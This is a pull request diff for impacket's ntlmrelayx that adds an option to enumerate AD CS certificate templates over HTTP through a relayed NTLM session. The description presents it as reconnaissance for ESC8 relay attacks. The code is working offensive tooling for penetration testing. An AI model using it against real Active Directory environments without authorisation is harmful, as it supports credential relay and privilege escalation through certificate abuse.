### PR TITLE
feat: Add support for enumerating templates over HTTP with ntlmrelayx

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -206,6 +206,7 @@ def start_servers(options, threads):
         c.setWebDAVOptions(options.serve_image)
         c.setIsADCSAttack(options.adcs)
         c.setADCSOptions(options.template)
+        c.setEnumTemplates(options.enum_templates)
         c.setIsShadowCredentialsAttack(options.shadow_credentials)
         c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type,
                                       options.cert_outfile_path)
@@ -396,6 +397,7 @@ if __name__ == '__main__':
     adcsoptions.add_argument('--adcs', action='store_true', required=False, help='Enable AD CS relay attack')
     adcsoptions.add_argument('--template', action='store', metavar="TEMPLATE", required=False, help='AD CS template. Defaults to Machine or User whether relayed account name ends with `$`. Relaying a DC should require specifying `DomainController`')
     adcsoptions.add_argument('--altname', action='store', metavar="ALTNAME", required=False, help='Subject Alternative Name to use when performing ESC1 or ESC6 attacks.')
+    adcsoptions.add_argument('--enum-templates', action='store_true', required=False, help='Enumerate enabled AD CS templates that the relayed account has access to')
 
     # Shadow Credentials attack options
     shadowcredentials = parser.add_argument_group("Shadow Credentials attack options")

--- a/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
@@ -35,6 +35,29 @@ class ADCSAttack:
         if self.username in ELEVATED:
             LOG.info('Skipping user %s since attack was already performed' % self.username)
             return
+        
+        if self.config.enumTemplates:
+            templates = self.enum_templates()
+            # Print the parsed results
+            for entry in templates:
+                try:
+                    LOG.info(f'  - {entry["REALNAME"]}')
+                    LOG.debug(f'    - KEYSPEC: {entry["KEYSPEC"]}')
+                    LOG.debug(f'    - KEYFLAG: {entry["KEYFLAG"]}')
+                    LOG.debug(f'    - ENROLLFLAG: {entry["ENROLLFLAG"]}')
+                    LOG.debug(f'    - PRIVATEKEYFLAG: {entry["PRIVATEKEYFLAG"]}')
+                    LOG.debug(f'    - SUBJECTFLAG: {entry["SUBJECTFLAG"]}')
+                    LOG.debug(f'    - RASIGNATURE: {entry["RASIGNATURE"]}')
+                    LOG.debug(f'    - CSPLIST: {entry["CSPLIST"]}')
+                    LOG.debug(f'    - EXTOID: {entry["EXTOID"]}')
+                    LOG.debug(f'    - EXTMAJ: {entry["EXTMAJ"]}')
+                    LOG.debug(f'    - EXTFMIN: {entry["EXTFMIN"]}')
+                    LOG.debug(f'    - EXTFMIN: {entry["EXTMIN"]}')
+                    LOG.debug(f'    - FRIENDLYNAME: {entry["FRIENDLYNAME"]}')
+                except KeyError:
+                    LOG.info(f'  - {entry}')
+            LOG.info("Certificate enumeration complete!")
+            return
 
         current_template = self.config.template
         if current_template is None:
@@ -120,3 +143,49 @@ class ADCSAttack:
         if altName:
             return "CertificateTemplate:{}%0d%0aSAN:upn={}".format(template, altName)
         return "CertificateTemplate:{}".format(template)
+    
+    def enum_templates(self):
+        enum_headers = {
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36",
+            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+            "Accept-Encoding": "gzip, deflate, br",
+            "Accept-Language": "en-US,en;q=0.9",
+            "Connection": "keep-alive"
+        }
+
+        # Key mapping for parsing
+        KEY_MAPPING = {
+            0: "OFFLINE",
+            1: "REALNAME",
+            2: "KEYSPEC",
+            3: "KEYFLAG",
+            4: "ENROLLFLAG",
+            5: "PRIVATEKEYFLAG",
+            6: "SUBJECTFLAG",
+            7: "RASIGNATURE",
+            8: "CSPLIST",
+            9: "EXTOID",
+            10: "EXTMAJ",
+            11: "EXTFMIN",
+            12: "EXTMIN",
+            13: "FRIENDLYNAME",
+        }
+
+        LOG.info("Enumerating certificates")
+        self.client.request("GET", "/certsrv/certrqxt.asp", headers=enum_headers)
+        response = self.client.getresponse()
+        content = response.read()
+        option_lines = re.findall(r"<Option Value.*?>", content.decode())
+
+        parsed_results = []
+        for line in option_lines:
+            # Extract the content after "<Option Value="
+            match = re.search(r"<Option Value=\"(.*?)\">", line)
+            if match:
+                raw_data = match.group(1)
+                # Split the data by semicolon
+                parsed_data = raw_data.split(";")
+                # Map the parsed data using the key mapping
+                parsed_dict = {KEY_MAPPING.get(i, f"UNKNOWN_{i}"): value for i, value in enumerate(parsed_data)}
+                parsed_results.append(parsed_dict)
+        return parsed_results

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -96,6 +96,7 @@ class NTLMRelayxConfig:
         self.isADCSAttack = False
         self.template = None
         self.altName = None
+        self.enumTemplates = False
 
         # Shadow Credentials attack options
         self.IsShadowCredentialsAttack = False
@@ -242,6 +243,9 @@ class NTLMRelayxConfig:
 
     def setIsADCSAttack(self, isADCSAttack):
         self.isADCSAttack = isADCSAttack
+
+    def setEnumTemplates(self, enumTemplates):
+        self.enumTemplates = enumTemplates
 
     def setIsShadowCredentialsAttack(self, IsShadowCredentialsAttack):
         self.IsShadowCredentialsAttack = IsShadowCredentialsAttack


### PR DESCRIPTION
Original PR on fortra/impacket: https://github.com/fortra/impacket/pull/1879

Adds the ability to enumerate ADCS templates using only HTTP with a relayed user. Useful in the event that LDAP signing is enforced and LDAP channel binding is set up properly, but ESC8 is still present. Previously, you would have needed another way to enumerate certificate names (or attempt to blindly hit `Client` or `Machine` templates with your fingers crossed).

Note that the HTTP endpoint doesn't give back verbose details like `EnrolleeSuppliesSubject`, etc. so its still only a way to get accessible/enabled certificate templates only.

- Added `--enum-templates` for ADCS options

## Default behavior

![image](https://github.com/user-attachments/assets/caf0de8d-3a1c-4e15-ab88-652eaccbd094)

## With debug

![image](https://github.com/user-attachments/assets/094a5548-62a3-4d51-8d41-0480b3b28494)
![image](https://github.com/user-attachments/assets/70521f7b-055e-4457-abf8-9a0227f8222d)
